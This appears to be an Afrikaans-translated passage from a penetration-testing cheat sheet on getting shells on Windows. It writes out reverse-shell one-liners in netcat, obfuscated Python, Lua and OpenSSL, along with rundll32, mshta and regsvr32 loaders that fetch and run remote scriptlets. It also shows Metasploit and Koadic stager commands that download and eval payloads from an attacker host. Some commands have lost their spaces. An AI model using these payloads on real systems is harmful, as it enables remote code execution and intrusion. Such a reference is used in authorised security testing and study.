Die bladsy lolbas-project.github.io is vir Windows soos https://gtfobins.github.io/ is vir Linux.
Duidelik, daar is nie SUID-lêers of sudo-voorregte in Windows nie, maar dit is nuttig om te weet hoe sommige binêre lêers (mis)bruik kan word om sekere onverwagte aksies uit te voer soos die uitvoer van arbitrêre kode.
NC
nc.exe-ecmd.exe<Attacker_IP><PORT>
SBD
sbd is 'n draagbare en veilige Netcat-alternatief. Dit werk op Unix-soortgelyke stelsels en Win32. Met kenmerke soos sterk enkripsie, program uitvoering, aanpasbare bronpoorte, en voortdurende herverbinding, bied sbd 'n veelsydige oplossing vir TCP/IP kommunikasie. Vir Windows-gebruikers kan die sbd.exe weergawe van die Kali Linux-verspreiding gebruik word as 'n betroubare vervanging vir Netcat.
#WindowsC:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Web Delivery
The Web Delivery module is a unique way of delivering payloads through a web server. The module starts a web server that hosts a payload. When the target visits the server, the payload is executed on the target machine. This method is useful for delivering payloads in scenarios where the target is not directly accessible from the attacker's machine.
PowerShell
PowerShell is a task automation and configuration management framework from Microsoft, consisting of a command-line shell and associated scripting language. Metasploit has a wide range of PowerShell payloads that can be used to execute code on a target machine. These payloads are useful for scenarios where traditional methods may be detected by security solutions.
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
OpenSSH
Aanvaller (Kali)
opensslreq-x509-newkeyrsa:4096-keyoutkey.pem-outcert.pem-days365-nodes#Generate certificateopenssls_server-quiet-keykey.pem-certcert.pem-port<l_port>#Here you will be able to introduce the commandsopenssls_server-quiet-keykey.pem-certcert.pem-port<l_port2>#Here yo will be able to get the response
Slachtoffer
Windows
Windows Command Prompt
Die Windows Command Prompt is 'n baie nuttige tool vir die uitvoering van verskeie take tydens 'n aanval. Dit kan gebruik word vir die uitvoering van opdragte, die navigasie deur die lêersisteem, die skep van nuwe lêers en nog baie meer.
PowerShell
PowerShell is 'n kragtige skripsie taal wat deur aanvallers gebruik kan word vir die uitvoering van gevorderde aanvaltegnieke. Dit bied 'n wye verskeidenheid van funksies en kan selfs gebruik word vir die skadelike uitvoering van kode.
Metasploit Meterpreter
Metasploit Meterpreter is 'n kragtige aanvalswerktuig wat deur Metasploit verskaf word. Dit bied 'n volledige omgewing vir die uitvoering van aanvaltegnieke op 'n slagoffer se stelsel. Metasploit Meterpreter bied 'n verskeidenheid van funksies soos lêerbestuur, prosesbeheer, en selfs die kap van webkameras.
<?XML version="1.0"?><!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --><scriptlet><public></public><scriptlanguage="JScript"><![CDATA[var r = new ActiveXObject("WScript.Shell").Run("calc.exe");]]></script></scriptlet>
Rundll32 - Metasploit
usewindows/smb/smb_deliveryrun#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
Rundll32 - Koadic
usestager/js/rundll32_jssetSRVHOST192.168.1.107setENDPOINTsalesrun#Koadic will tell you what you need to execute inside the victim, it will be something like:rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
usemulti/script/web_deliverysettarget3setpayloadwindows/meterpreter/reverse/tcpsetlhost10.2.0.5run#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer deur die stager regsvr te gebruik
In die Skulpe-vouer is daar baie verskillende skulpe. Om Invoke-PowerShellTcp.ps1 af te laai en uit te voer, maak 'n kopie van die skripsie en voeg dit aan die einde van die lêer by: